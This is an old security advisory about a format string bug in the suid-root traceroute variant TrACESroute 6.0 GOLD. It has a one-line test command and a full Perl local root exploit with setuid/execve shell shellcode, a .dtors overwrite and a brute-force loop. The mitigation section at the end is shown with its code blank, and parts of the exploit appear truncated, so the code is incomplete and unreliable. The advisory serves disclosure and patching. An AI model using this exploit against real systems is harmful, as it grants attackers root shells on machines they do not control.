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TrACESroute Format String bug
10th Jun 2002 [SBWID-5415]

	TrACESroute Format String bug


	TrACESroute 6.0 GOLD


	DownBload    [downbload@hotmail.com]    found    following     regarding
	TrACESroute, another traceroute program.

	TrACESroute use RAW SOCKET, so it must be run under  root  account,  and
	because of that, traceroute usually has attached suid bit.

	TrACESroute is vulnerable to format  string  bug.  This  piece  of  code
	cause bug:










	Test this format string bug with:

	./traceroute -T %s%s%s localhost



	There are probably more bugs in TrACESroute. I  saw  lot\'s  of  strcpy,
	sprintf etc., but i don\'t have time to check it.


	 Update : Exploit (18 June 2002)



	Provided by thc [thc@drug.org] :




	## ---/ tracesex.pl /---------------------------------------------------


	## TrACESroute 6.0 GOLD local format string exploit

	##   * tested on Red Hat Linux release 7.2 (Enigma)

	##   * Jun 12 2002


	## Author: stringz // thc@drug.org

	## Vulnerability discovered by: downbload // downbload@hotmail.com


	## Developed on the Snosoft Cerebrum test bed. - http://www.snosoft.com


	## Greets: g463, syphix, S (super), KF, vacuum, dageshi, sozni,

	##         obscure, jove, rachel, kevin, and all of my 2e2h friends.


	## ---/ powered by pot /-----------------------------------------------


	# setuid + execve shellcode

	$kode =

	  \"\\x31\\xdb\".                 # xor ebx, ebx

	  \"\\xf7\\xe3\".                 # mul ebx

	  \"\\xb0\\x17\".                 # mov al, 0x17

	  \"\\xcd\\x80\".                 # int 0x80

	  \"\\x31\\xc0\".                 # xor  eax, eax

	  \"\\x99\".                     # cdq

	  \"\\x52\".                     # push edx

	  \"\\x68\\x2f\\x2f\\x73\\x68\".     # push dword 0x68732f2f

	  \"\\x68\\x2f\\x62\\x69\\x6e\".     # push dword 0x6e69622f

	  \"\\x89\\xe3\".                 # mov  ebx, esp

	  \"\\x52\".                     # push edx

	  \"\\x53\".                     # push ebx

	  \"\\x89\\xe1\".                 # mov  ecx, esp

	  \"\\xb0\\x0b\".                 # mov  al, 0x0b

	  \"\\xcd\\x80\";                 # int  0x80


	$vuln    = \"./tr\";  # CHANGE THIS!@#$%!

	$dtors   = 0x804e48c + 4;;


	printf(\"\\n-- TrACESroute 6.0 GOLD local format string exploit\\n\");

	printf(\"-- Author: stringz // thc\\@drug.org\\n\\n\");

	printf(\"-- Vulnerability discovered by: downbload // downbload\\@hotmail.com\\n\");


	$ret_addr = 0xc0000000 - 4

	    - (length($vuln) + 1)

	    - (length($kode) + 1)



	undef(%ENV); $ENV{\'1337\'} = $kode;


	printf(\"overwriting %#.08x with %#.08x\\n\", $dtors, $ret_addr);

	printf(\"bruteforcing distance (1 .. 300)\\n\");



	for (1 .. 300) {

	    $fmt_str = sw_fmtstr_create($dtors, $ret_addr, $_);

	    die(\"\\x0a\") if (system(\"$vuln -T $fmt_str localhost\"))

	        =~ m/^(0|256|512|32512)$/; # may need a tweak ;)




	sw_fmtstr_create ($$$)


	    die(\"Incorrect number of arguments for sw_fmtstr_create\")

	        unless @_ == 3;


	    my ($dest_addr, $ret_addr, $dist) = @_;

	    my ($word, $qword) = (2, 8);


	    # $dest_addr = where to write $ret_addr

	    # $ret_addr  = where to return execution

	    # $dist      = the calculated distance


	    $tmp1  = (($ret_addr >> 16) & 0xffff);

	    $tmp2  = $ret_addr & 0xffff;


	    if ($tmp1 < $tmp2) {

	        $high = $tmp1 - $qword;

	        $low  = $tmp2 - $high - $qword;


	        $dest_addr1 = pack(\'L\', $dest_addr + $word);

	        $dest_addr2 = pack(\'L\', $dest_addr);


	    else {

	        $high = $tmp2 - $qword;

	        $low  = $tmp1 - $high - $qword;


	        $dest_addr1 = pack(\'L\', $dest_addr);

	        $dest_addr2 = pack(\'L\', $dest_addr + $word);




	            $dest_addr1, $dest_addr2, $high, $dist,

	            $low, $dist + 1);




	If your users doesn\'t need traceroute, remove suid  bit  from  it,  or:
	Replace this:







	With this:







	Terminator is variable which can contain line-terminator chars.  It  can
	be  changed  with  -T  option.  Fprintf  is  just  ->  #define   Fprintf

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